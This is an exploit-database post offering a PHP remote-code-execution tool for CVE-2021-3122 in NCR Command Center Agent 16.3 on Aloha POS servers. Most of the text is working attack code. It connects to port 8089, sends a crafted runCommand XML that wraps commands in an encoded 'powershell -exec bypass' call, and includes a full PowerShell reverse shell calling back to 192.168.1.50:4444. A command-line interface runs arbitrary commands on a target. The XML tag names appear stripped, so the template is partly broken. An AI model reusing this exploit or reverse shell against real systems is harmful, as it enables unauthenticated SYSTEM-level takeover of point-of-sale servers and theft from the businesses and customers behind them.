============================================================================================================================================= | # Title : NCR Command Center Agent 16.3 RCE Exploit | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : https://www.ncr.com/ | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/211034/ & CVE-2021-3122 [+] Summary : This PHP implementation provides a tool for testing the CVE-2021-3122 vulnerability in NCR Command Center Agent version 16.3 on Aloha POS/BOH servers. The vulnerability allows remote, unauthenticated attackers to execute arbitrary commands with SYSTEM privileges by sending a specially crafted XML document to port 8089. [+] POC : php poc.php rhost = $rhost; $this->rport = $rport; $this->verbose = $verbose; } /** * التحقق من وجود الخدمة */ public function check() { try { $socket = $this->connect(); // محاولة قراءة البنر $banner = $this->readSocket($socket, 1024); $this->disconnect($socket); if (strpos($banner, 'getMessage(); } } /** * إنشاء حمولة XML */ private function generateXml($cmdPayload) { $workitem_id = rand(1, 9); $source_node = rand(1, 9); $exec_statuses = ['Unknown', 'Waiting', 'InProgress']; $exec_status = $exec_statuses[array_rand($exec_statuses)]; $dest_servers = ['WebServer', 'RdfServer']; $dest_server = $dest_servers[array_rand($dest_servers)]; $guid = $this->generateGuid(); $xml_body = ''; $xml_body .= ''; $xml_body .= '' . $workitem_id . ''; $xml_body .= 'runCommand'; $xml_body .= '' . $source_node . ''; $xml_body .= '0'; $xml_body .= '' . $exec_status . ''; $xml_body .= ''; $xml_body .= ''; $xml_body .= '' . $cmdPayload . ''; $xml_body .= '' . $guid . ''; $xml_body .= ''; $xml_body .= '' . $dest_server . ''; $xml_body .= ''; $xml_body .= ''; $xml_body .= '<:EOM:>'; return $xml_body; } /** * توليد GUID عشوائي */ private function generateGuid() { if (function_exists('com_create_guid') === true) { return trim(com_create_guid(), '{}'); } $data = random_bytes(16); $data[6] = chr(ord($data[6]) & 0x0f | 0x40); // version 4 $data[8] = chr(ord($data[8]) & 0x3f | 0x80); // variant return vsprintf('%s%s-%s-%s-%s-%s%s%s', str_split(bin2hex($data), 4)); } /** * إنشاء حمولة PowerShell */ private function createPowerShellPayload($encodedPayload) { // حمولة PowerShell الأساسية $payload = "powershell -exec bypass -enc " . $encodedPayload; return $payload; } /** * تشغيل الاستغلال */ public function exploit($payload) { try { $socket = $this->connect(); if ($this->verbose) { echo "[+] Connected to {$this->rhost}:{$this->rport}\n"; } // ترميز الحمولة (يمكن استخدام base64 هنا) $encodedPayload = base64_encode($payload); $cmdPayload = $this->createPowerShellPayload($encodedPayload); // إنشاء XML $payloadXml = $this->generateXml($cmdPayload); if ($this->verbose) { echo "[*] Generated payload XML\n"; } // إرسال الحمولة $this->writeSocket($socket, $payloadXml); if ($this->verbose) { echo "[*] Payload sent\n"; echo "[*] Check your listener\n"; } // قراءة الاستجابة (اختياري) $response = $this->readSocket($socket, 4096); $this->disconnect($socket); return [ 'success' => true, 'response' => $response ]; } catch (Exception $e) { return [ 'success' => false, 'error' => $e->getMessage() ]; } } /** * الاتصال بالهدف */ private function connect() { $socket = @fsockopen($this->rhost, $this->rport, $errno, $errstr, $this->timeout); if (!$socket) { throw new Exception("Failed to connect: {$errstr} ({$errno})"); } // تعيين مهلة للقراءة/الكتابة stream_set_timeout($socket, $this->timeout); return $socket; } /** * كتابة البيانات إلى السوكيت */ private function writeSocket($socket, $data) { $written = fwrite($socket, $data); if ($written === false) { throw new Exception("Failed to write to socket"); } return $written; } /** * قراءة البيانات من السوكيت */ private function readSocket($socket, $length) { $data = fread($socket, $length); if ($data === false) { throw new Exception("Failed to read from socket"); } return $data; } /** * قطع الاتصال */ private function disconnect($socket) { if (is_resource($socket)) { fclose($socket); } } /** * مثال على استخدام الكود */ public static function exampleUsage() { $target = "192.168.1.100"; $port = 8089; $exploit = new self($target, $port, true); echo "[*] Checking target...\n"; $checkResult = $exploit->check(); echo "[*] Check result: {$checkResult}\n"; if ($checkResult === "Detected") { // حمولة PowerShell عكسية مثال // يمكنك تغييرها حسب احتياجاتك $reverseShellPayload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.1.50",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'; echo "[*] Executing exploit...\n"; $result = $exploit->exploit($reverseShellPayload); if ($result['success']) { echo "[+] Exploit executed successfully\n"; if (!empty($result['response'])) { echo "[+] Response: " . htmlspecialchars($result['response']) . "\n"; } } else { echo "[-] Exploit failed: " . $result['error'] . "\n"; } } else { echo "[-] Target not vulnerable or service not detected\n"; } } } // استخدام الكود من سطر الأوامر if (php_sapi_name() === 'cli') { $options = getopt("h:p:v::", ["help", "check", "exploit:"]); if (isset($options['h']) || isset($options['help'])) { echo "NCR Command Center Agent RCE Exploit (CVE-2021-3122)\n"; echo "Usage:\n"; echo " -h Target host\n"; echo " -p Target port (default: 8089)\n"; echo " -v Verbose mode\n"; echo " --check Check if target is vulnerable\n"; echo " --exploit Execute exploit with payload\n"; echo "\nExample:\n"; echo " php " . basename(__FILE__) . " -h 192.168.1.100 --check\n"; echo " php " . basename(__FILE__) . " -h 192.168.1.100 -v --exploit 'whoami'\n"; exit(0); } if (isset($options['h'])) { $host = $options['h']; $port = isset($options['p']) ? $options['p'] : 8089; $verbose = isset($options['v']); $exploit = new NCRCommandCenterExploit($host, $port, $verbose); if (isset($options['check'])) { $result = $exploit->check(); echo "Target: " . $host . ":" . $port . "\n"; echo "Status: " . $result . "\n"; } if (isset($options['exploit'])) { $payload = $options['exploit']; $result = $exploit->exploit($payload); if ($result['success']) { echo "Exploit executed successfully!\n"; } else { echo "Exploit failed: " . $result['error'] . "\n"; } } } else { echo "Error: Target host is required. Use -h for help.\n"; } } // لاختبار الكود مباشرة (إلغاء التعليق للاختبار) // NCRCommandCenterExploit::exampleUsage(); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================